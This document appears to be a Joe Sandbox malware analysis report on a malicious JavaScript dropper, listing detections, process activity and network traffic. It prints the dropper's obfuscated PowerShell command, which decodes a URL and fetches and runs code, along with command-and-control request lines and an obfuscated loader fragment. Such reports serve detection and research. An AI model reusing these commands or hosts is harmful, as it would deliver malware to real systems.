Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f699.js

Overview

General Information

Sample name:f699.js
Analysis ID:1416950
MD5:1e8ca7d25ee56d99775b19057e4b6d4c
SHA1:faac5ed0ade48c88814f3cd8f573406f7a5931d7
SHA256:f699b87dd723fe073c813f7b503a6012254d5da5702376caab7cc25dbae543f2
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Creates processes via WMI
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6976 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • conhost.exe (PID: 3804 cmdline: conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira) MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3652 cmdline: powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", ProcessId: 6976, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js", ProcessId: 6976, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira), CommandLine: powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 3804, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press -useb $lira), ProcessId: 3652, ProcessName: powershell.exe

Snort Signatures

Timestamp:03/28/24-10:32:31.974882
SID:2856553
Source Port:65392
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: https://temp.sh/bfseS/ruzxs.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: https://temp.sh/bfseS/ruzxs.exeVirustotal: Detection: 9%Perma Link
Multi AV Scanner detection for submitted file
Source: f699.jsVirustotal: Detection: 8%Perma Link
Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbZC source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.pdb)f source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *n.pdb source: powershell.exe, 00000002.00000002.1756422832.000001B32DD91000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb-g source: powershell.exe, 00000002.00000002.1803138150.000001B346900000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.1755950559.000001B32C35D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1801780109.000001B34662A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Snort IDS alert for network traffic
Source: TrafficSnort IDS: 2856553 ETPRO TROJAN TA582 Domain in DNS Lookup 192.168.2.4:65392 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /bfseS/ruzxs.exe HTTP/1.1Host: temp.shConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 51.91.79.17 51.91.79.17
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /1.php?s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: isyzgez.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mknjddllgakhaje.topConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /bfseS/ruzxs.exe HTTP/1.1Host: temp.shConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /1.php?s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: isyzgez.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: mknjddllgakhaje.topConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: isyzgez.top
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.18.0 (Ubuntu)Date: Thu, 28 Mar 2024 09:32:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: close
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://isyzgez.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://isyzgez.top/1.php?s=mints1
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mknjddllgakhaje.top
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F719000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FBAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1800811353.000001B346500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c9t
Source: powershell.exe, 00000002.00000002.1756548460.000001B32DE71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1782155749.000001B33DEE2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.1756548460.000001B32FB37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh
Source: powershell.exe, 00000002.00000002.1756548460.000001B32F9E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32F9D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1756548460.000001B32E093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://temp.sh/bfseS/ruzxs.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownHTTPS traffic detected: 51.91.79.17:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

barindex
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8BBFF62_2_00007FFD9B8BBFF6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8BCDA22_2_00007FFD9B8BCDA2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8A0E8A2_2_00007FFD9B8A0E8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8B32A02_2_00007FFD9B8B32A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B8B35702_2_00007FFD9B8B3570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B9715762_2_00007FFD9B971576
Source: f699.jsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: classification engineClassification label: mal96.expl.evad.winJS@4/5@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $eg6f5dmnzj0lbip.(([system.String]::new(@((8087-(67640680/(9188-(-4793+5547)))),(5997-5886),(10201-(4658+5431)),(-4512+(13879-(33091434/(8000-4421)))),(2038-1954),(909312/8192)))))( $4b7iqngl0fm3zt1 ) $eg6f5dmnzj0lbip.(([char[]]@((3528-3461),(8217-(59487624/7336)),(6501-(-2090+8480)),(4119-(13728-9724)),(-8905+9006)) -join ''))()$fu4ironpzhmjw2l.(([system.String]::new(@((216142/(8581160/(-3545+(53859400/(4076+4604))))),(499500/4625),(61827/557),(-2276+(-6344+8735)),(6194-(55757043/(66619280/7280)))))))()[byte[]] $f9woybdmlgz7nvr = $4b7iqngl0fm3zt1.((-join (@((664608/(847+(11904525/1685))),(-8954+9065),(503685/(14036-(14041-7754))),(-4671+4785),(639882/5613),(59267/(4002050/(1329+5221))),(568337/4697))| ForEach-Object { [char]$_ })))() $nha63b49uvzd1mt=$f9woybdmlgz7nvr return $nha63b49uvzd1mt}[System.Text.Encoding]::ascii.(([system.String]::new(@((124676/(-4260+(4704512/(-4489+(14854-9583))))),(410565/(-4545+(9172-(9630-9068)))),(303-187),(807258/(56887374/(11683-(29630886/(-613+(35910828/(-2159+8468))))))),(576636/(14293-(49173550/(20113575/(4938-(5916375/(3110+(256+(-295+2188))))))))),(556548/4882),(871080/8296),(797940/7254),(157178/1526)))))((3gb87m6det9axhcu5nfkjyiz02o "af9rbmhiZmQ2eJqsLRt/ORql+Ufyp1ZQXs9QhwWX3zsecG5QQe/Egmq74VgqPndhVT/1KqKGjoL5D/jfKdPkzExQ9FODdWwiEc6Y8juX2TBng5wLKa28GdcdGJrCnM4Hjf80YXddnJqVi4B/aKi+0bX92F4ORQgLS0tYgrd8iLtPhPR/0TutsVQYkJDTo+A/wIvdUaSdl5Z9nxhuyE6PQZYcXl2OwuvtraoT3xO5CSut5GtMjakUEbQMJSrsVRa1q2vVHSdHKFnlsFhyuYgauHeZOKcmJOQvwaC5sgqRmt6ITCCXSZmyC4/1C6icLmDqZB9vVRbyHY5BnsSKFIFG2g05G4PdyLPm/EpQ+fq5Mg6bhJG0bjc7JGLnuaFksovVOS4sEv1NIhkRiqv+W46sAN/7GVxNAoHJi5sUcUSu3b55J4HuzaqEA+Hb3aSlAJOq7FsNj/oL0deVjIkECGDYmdm21hBtlXFDW00ttYDhqfU9tJbJSBmEivL5DBBMBIj2nCg6BIY4AUtupxqdIBkxppQkXQ1p7mW+S1vSt3atW6D7w+/FnSI4897c3/DUlqTtScE7iczfArWTtPZbIQ4Jr9/HYTOcV0gLCMGejR7BAQTjxgAvHD5o8YTU+HhI4IGZYho2PZzOBYXDQEnr8ZAZDHMo/SbDjrLgg3F18dE+z9UjeBuED48hxkmux9xUGdVsnVhEVi3vQeogWdZT/sqF1LyMoFfCCcGkhV3uBU59hbhBsoyBl8HTr1aTDxoq8K6pm4LeBgMwjsGmvRWicwQEgTHllcgHAVn3b8GLG8GTcZWmO5lJH925Lc2mWz1mmk25Ptz+iz+ZAousIMT9Qdo1lyhPooRq3Zxqk0xROFFLKAj7/foRQF7so2rBe/49VLu4lMbcApYQGJVdX5B/kMtekgkdHLzOxIYgi5qNEQccg75tpY5MhYATlAwZkRTDEojLj99YkZyR4e2P4cAPGMJZ1vCF8gboNWyS3s07FEiyvoSuK9Yc4aJq1rWg4dnVe1t8IAy6J5rHrhZgD5sBXjHq2E0kQ3TtmADcTV+U5We/mOCf5/4KyL3FaXUchLDxOsdkmGyZPBWMMV/Pk9HXzVstmY/l0fN9pgrLFw6jLe8wOoKyExdjmkh+EaU5BOxN/zmi5kRYUymP+xuuuBaLz3BYrZP54XPJ61DHQcu93EfUDVPvQQDnP75v4qTTZDihDvJSX+O5yXY4s8IiH+n/0/GdK98ZGpbOivHL82hQN3sJ+U973XpTTdMLfxyf3JhBj8L5l6WmnW855YjNAsZEe/muicj4tk+7H8ERM2IxXAhvRsrj42w1yR9WVgtR4zI2y6i6NjdDezL7zdMO4ASpSXVHgqcU6IANrzLBda+gAGU